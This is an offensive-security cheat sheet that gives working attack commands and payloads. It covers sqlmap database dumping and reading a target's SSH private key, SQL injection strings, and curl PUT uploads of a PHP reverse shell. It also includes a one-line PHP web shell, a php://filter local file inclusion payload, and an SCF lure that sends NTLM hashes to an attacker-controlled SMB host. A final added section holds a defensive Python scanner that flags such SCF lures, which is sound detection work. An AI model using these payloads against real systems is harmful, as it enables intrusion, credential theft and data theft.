Tools-Exploitation


Exploitation


SQL-Injection

SQL-Map

##Save a request inside Burp with the "Save to File" function.
##Let's assume a request where the parameter "id" might be injectable. Save the request to a file called id.req.
##Then run SQLMap with -p and the name of the parameter to test.
> sqlmap -r id.req -p id

##Another way of telling SQLMap which parameter to test for injection is to replace the values of those parameters inside the request file with a wildcard (*). All parameters with a wildcard as a value will be tested for injection. The -p parameter is not needed in these cases to run SQLMap.
## --dump will dump the content of the databases.
> sqlmap -r file.req --dump
## It is also possible to read local files off the target system.
> sqlmap -r file.req --file-read /home/offensiveuser/.ssh/id_rsa


Manual injection testing

##Use ' to see if a web request gives an abnormal response
##Use -- - to comment out any concatenated SQL statement that might otherwise break the query
##Use URL-encoding inside the web browser
Admin'--+-
##Use URL-encoding for everything else inside Burp
Admin'--%20-


Miscellaneous:

RCE via PHP:
##Check if the HTTP PUT method is allowed or if there is another way to upload .php files
##Execute commands via http://10.10.10.10/upload/shell.php?offensive=whoami
> curl -v -X OPTIONS http://10.10.10.10/upload
> curl -v -X PUT -T rev_shell.php http://10.10.10.10/upload/

> curl -v -X PUT -d "my data as a string" http://10.10.10.10/upload/shell.php
> curl -v -X PUT http://10.10.10.10/upload/shell.php -d @/path/to/file

##Or save the following code as a .php file and upload it via the application
> <?php system($_REQUEST['offensive']);?>


PHP-Wrapper for LFI:
##Pass it as an argument (most likely needs to point at a .php file)
> (url) ?var1=1&var2=php://filter/convert.base64-encode/resource=/path/to/file.php


Steal NTLM hash via a writeable SMB share:
##Put an SCF file inside the Windows share. The SCF file triggers SMB authentication to Responder as soon as a user browses the share's directory (LINK).
> vim @offensiveIT.scf

[Shell]
Command=2
IconFile=\\10.10.10.10\share\offensiveIT.ico
[Taskbar]
Command=explorer
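Defender-side addition (example code written for these notes, not part of the original page): a scanner for a locally mounted share that parses .scf files and flags any whose IconFile points at a UNC host outside an assumed allowlist, which is exactly the lure shown above. The SAMPLES contents and the TRUSTED_HOSTS allowlist are constructed for the demo.

```python
"""Scan a mounted share for .scf files whose IconFile points at a remote UNC host."""
import re
import tempfile
from pathlib import Path

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # captures "host" in \\host\share\...

# Constructed sample SCF contents for the demo (not taken from a real share).
SAMPLES = {
    "@lure.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.10.10\\share\\offensiveIT.ico\r\n"
                 "[Taskbar]\r\nCommand=explorer\r\n",
    "desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                   "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
}
TRUSTED_HOSTS = {"fileserver01"}  # assumed allowlist of legitimate icon hosts

def icon_target(scf_text):
    """Return the IconFile value from SCF text (case-insensitive key), or None if absent."""
    for line in scf_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "iconfile":
            return value.strip()
    return None

def unc_host(target):
    """Return the lowercased host of a \\host\share\... path, or None for local paths."""
    m = UNC_RE.match(target or "")
    return m.group(1).lower() if m else None

def scan_texts(files):
    """files: {name: content}. Returns [(name, host)] for SCF files pointing at untrusted UNC hosts."""
    findings = []
    for name, text in files.items():
        host = unc_host(icon_target(text))
        if host and host not in TRUSTED_HOSTS:
            findings.append((name, host))
    return findings

def scan_share(root):
    """Read every *.scf (any case) under root and run scan_texts over it."""
    root = Path(root)
    files = {str(p.relative_to(root)): p.read_text(errors="replace")
             for p in root.rglob("*") if p.is_file() and p.suffix.lower() == ".scf"}
    return scan_texts(files)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # stand-in for the mounted share
        for name, text in SAMPLES.items():
            (Path(d) / name).write_text(text)
        for name, host in scan_share(d):
            print(f"ALERT {name}: IconFile points at \\\\{host}")
```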